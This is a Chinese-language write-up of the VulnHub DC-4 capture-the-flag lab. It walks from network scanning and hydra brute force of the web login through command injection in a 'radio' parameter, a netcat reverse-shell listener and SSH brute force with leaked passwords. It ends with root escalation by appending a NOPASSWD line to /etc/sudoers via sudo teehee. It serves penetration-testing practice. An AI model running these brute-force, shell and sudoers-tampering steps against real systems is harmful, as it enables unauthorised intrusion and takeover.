0X01 环境部署

1.下载地址

https://www.vulnhub.com/entry/dc-4,313/


安装好并将网络置为NET模式
kali net模式
DC-4 net模式


0X02 信息收集

1.主机发现

arpscan -l


1. kali   192.168.190.128
2. 目标机  192.168.190.132
2.目录扫描
python3 dirsearch.py -u http://192.168.190.132/


3.查看网站配置


4.端口收集

nmap -sS 192.168.190.132


发现存在80端口，可以进行查看


admin多半是账户名，进行爆破，本次利用kali自带的爆破软件hydra,爆破字典也是kali自带
位置在/usr/share/wordlists/rockyou.txt.gz


hydra -l admin -P rockyou.txt 192.168.190.132 http-post-form "/login.php:usernam
e=^USER^&password=^PASS^:S=logout" -F


账号：admin

密码：happy


抓取网络数据包，发现是命令执行

接收命令的参数就是radio


尝试修改radio后面参数，例whoami，查看当前权限


0X03 Getshell

进行反弹shell

kali开启监听          nc -lvnp 5678

利用可以进行执行命令，  进行反弹shell


进行交互式的：python -c 'import pty;pty.spawn("/bin/bash")'


切换到home 加目录下进行查看
cd /home
ls la
发现有三个用户，切换到jim目录下进行查看
cd jim
ls -la


到jim用户下的目录进行查看是否有可以利用的信息

cat test.sh


查看其他目录
cd /backups
ls
cat old-passwords.bak
将查到的密码进行保存
vim mm.txt



由于刚刚查看端口信息时,发现了22端口，可以利用hydra再次进行爆破

hydra -l jim -P mm.txt -I -t 64 ssh://192.168.190.132:22


jim/jibril04

尝试进行登录

ssh jim@192.168.190.132


0X04 提权

1.当前权限

whoami


尝试sudo 是否可以提权

sudo -l


查看有什么其他的文件

ls

cat mbox   


发现是一份邮件，进行一个查看

cd /var/mail

cat jim


是一份charles写给jim的信，有charles的密码

charles/ ^xHhA&hvim0y

切换到charles用户下查看其文件是否可以进行提权

su charles
cd /home/charles
ls -la


继续利用sudo提权尝试

sudo -l


2.开始提权

tee-从标准输入读取并写入标准输出和文件
​
由于我们没有sudo权限，也就没有办法切换成root用户，但是teehee或许可以帮助进行提权成功，输入此代码：

echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers

这句话的意思是将charles这个用户赋予执行sudo的权限添加到/etc/sudoers里。
| 是管道符 将前面的输出添加到后面
sudo teehee -a 是用管理员权限使用teehee -a命令
teehee -a 是添加一条语句到 /etc/sudoers里
/etc/sudoers 里存着的用户都有执行sudo的权限。


sudo su
whoami
ls -la
cat flag.txt



0X05 总结

1.首先收集信息，真实ip，端口，网站目录，网站部署部件等
2.根据开放端口进行测试
3.利用80端口配合命令执行，getshell
4.利用用户之间的关系进行测试
5.查看权限，利用sudo进行提权
6.提权成功查看flag